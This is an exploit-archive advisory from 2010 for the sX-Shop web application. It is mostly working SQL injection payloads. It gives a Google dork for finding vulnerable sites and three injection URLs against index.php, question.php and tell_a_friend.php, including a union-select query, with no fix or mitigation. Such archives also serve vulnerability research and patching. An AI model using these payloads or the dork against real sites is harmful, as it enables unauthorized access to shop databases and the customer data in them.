sX-Shop Multiple SQL Injection Vulnerabilities

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : sX-Shop Multiple SQL Injection Vulnerabilities
# Published : 2010-08-05
# Author : CoBRa_21
# Previous Title : APBoard v2.1.0 ( board.php?id=) SQL Injection Vulnerability
# Next Title : Nuked-Klan Module Partenaires NK 1.5 Blind Sql Injection

########################################################################################

sX-Shop SQL Injection Vulnerabilities

########################################################################################

Author : CoBRa_21
Author Web Page :http://ipbul.org
Dork : "powered by sX-Shop"
Script Page : http://www.source-worx.de/

########################################################################################
 
Sql Injection :

http://localhost/[path]/index.php?product=_513' (Sql)
http://localhost/[path]/question.php?id=-513 union select version()  (Sql)
http://localhost/[path]/tell_a_friend.php?id=-500 union select version()  (Sql)

########################################################################################
Thanks cyber-warrior.org  &  e-banka.org & AKINCILAR
########################################################################################